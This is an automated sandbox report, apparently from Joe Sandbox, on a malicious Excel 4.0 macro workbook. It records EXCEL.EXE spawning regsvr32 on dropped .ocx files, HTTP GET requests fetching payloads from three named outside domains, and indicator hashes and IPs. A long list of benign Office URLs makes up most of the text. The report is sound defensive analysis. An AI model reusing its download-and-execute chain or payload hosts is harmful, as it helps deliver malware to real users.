Create Interactive Tour

Windows Analysis Report UT-1759246356.xlsb

Overview

General Information

Sample Name:	UT-1759246356.xlsb
Analysis ID:	541008
MD5:	120135bf5c8cfd817edbb84c181387a3
SHA1:	ae9b40d408165e279ef0034ed368be57f4b38291
SHA256:	73218eae799db142a512b9153fe938324cda2dca60ff0d4c8d7b131bf858b799
Infos:
Most interesting Screenshot:

Detection

Score:	52
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Sigma detected: Microsoft Office Product Spawning Windows Shell

Document exploit detected (process start blacklist hit)

Document exploit detected (UrlDownloadToFile)

Potential document exploit detected (unknown TCP traffic)

Tries to load missing DLLs

Uses a known web browser user agent for HTTP communication

Yara detected Xls With Macro 4.0

JA3 SSL client fingerprint seen in connection with other malware

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Classification

Process Tree

System is start

EXCEL.EXE (PID: 3436 cmdline: C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Downloads\vTlVWujWHA\UT-1759246356.xlsb MD5: 23CAD504B3E04BB54CD636AD2874041A)

regsvr32.exe (PID: 4356 cmdline: "C:\Windows\System32\regsvr32.exe" C:\Jambo\muh1.ocx MD5: 578BAB56836A3FE455FFC7883041825B)

regsvr32.exe (PID: 1560 cmdline: "C:\Windows\System32\regsvr32.exe" C:\Jambo\muh2.ocx MD5: 578BAB56836A3FE455FFC7883041825B)

regsvr32.exe (PID: 5812 cmdline: "C:\Windows\System32\regsvr32.exe" C:\Jambo\muh3.ocx MD5: 578BAB56836A3FE455FFC7883041825B)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
app.xml	JoeSecurity_XlsWithMacro4	Yara detected Xls With Macro 4.0	Joe Security

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: "C:\Windows\System32\regsvr32.exe" C:\Jambo\muh1.ocx, CommandLine: "C:\Windows\System32\regsvr32.exe" C:\Jambo\muh1.ocx, CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Downloads\vTlVWujWHA\UT-1759246356.xlsb, ParentImage: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, ParentProcessId: 3436, ProcessCommandLine: "C:\Windows\System32\regsvr32.exe" C:\Jambo\muh1.ocx, ProcessId: 4356

Jbx Signature Overview

• Compliance
• Software Vulnerabilities
• Networking
• System Summary
• Hooking and other Techniques for Hiding and Protection
• HIPS / PFW / Operating System Protection Evasion

Click to jump to signature section

Show All Signature Results

Source: unknown	HTTPS traffic detected: 192.185.209.37:443 -> 192.168.2.3:49869 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 128.204.218.95:443 -> 192.168.2.3:49871 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.241.203.226:443 -> 192.168.2.3:49875 version: TLS 1.2

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE

Process created: C:\Windows\System32\regsvr32.exe

Document exploit detected (UrlDownloadToFile)

Show sources

Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE

Section loaded: unknown origin: URLDownloadToFileA

Jump to behavior

Source: global traffic

TCP traffic: 192.168.2.3:49869 -> 192.185.209.37:443

Source: global traffic

DNS query: name: trzgestao.com.br

Source: global traffic

TCP traffic: 192.168.2.3:49869 -> 192.185.209.37:443

Source: excel.exe

Memory has grown: Private usage: 2MB later: 130MB

Source: global traffic	HTTP traffic detected: GET /NyHJnMatYpPH/ji.png HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: trzgestao.com.brConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /LXA6P0x2h9ES/ji.png HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: keylessguard.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /4N0w2l0mqZ/ji.png HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: as4estacoes.ptConnection: Keep-Alive

Source: Joe Sandbox View

JA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49875
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49871
Source: unknown	Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49875 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown	Network traffic detected: HTTP traffic on port 49869 -> 443

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://addinslicensing.store.office.com/apps/remove
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://api.aadrm.com
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://api.aadrm.com/
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://api.addins.store.office.com/addinstemplate
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://api.addins.store.office.com/app/query
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://api.cortana.ai
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://api.diagnostics.office.com
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://api.diagnosticssdf.office.com
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://api.microsoftstream.com/api/
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://api.office.net
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://api.onedrive.com
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/imports
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://apis.live.net/v5.0/
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://augloop.office.com
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://augloop.office.com/v2
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://autodiscover-s.outlook.com/
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://cdn.entity.
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://clients.config.office.net/
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://config.edge.skype.com
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://cortana.ai
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://cortana.ai/api
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://cr.office.com
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://dataservice.o365filtering.com
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://dataservice.o365filtering.com/
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://dev.cortana.ai
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://devnull.onenote.com
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://directory.services.
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://enrichment.osi.office.net/
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/v2.1601292631425
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://entitlement.diagnostics.office.com
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://fpastorage.cdn.office.net/%s
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://fpastorage.cdn.office.net/firstpartyapp/addins.xml
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://graph.ppe.windows.net
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://graph.ppe.windows.net/
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://graph.windows.net
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://graph.windows.net/
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://incidents.diagnostics.office.com
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://inclient.store.office.com/gyro/client
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://inclient.store.office.com/gyro/clientstore
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://invites.office.com/
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://lifecycle.office.com
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://login.microsoftonline.com/
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://login.windows.local
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://management.azure.com
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://management.azure.com/
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://messaging.office.com/
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://metadata.templates.cdn.office.net/client/log
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://ncus.contentsync.
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://ncus.pagecontentsync.
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://officeapps.live.com
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://onedrive.live.com
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://onedrive.live.com/embed?
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://osi.office.net
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://otelrules.azureedge.net
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://outlook.office.com
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://outlook.office.com/
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://outlook.office365.com
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://outlook.office365.com/
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://pages.store.office.com/review/query
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://powerlift.acompli.net
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://roaming.edog.
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://settings.outlook.com
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://shell.suite.office.com:1443
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://skyapi.live.net/Activity/
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://staging.cortana.ai
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://store.office.cn/addinstemplate
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://store.office.de/addinstemplate
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
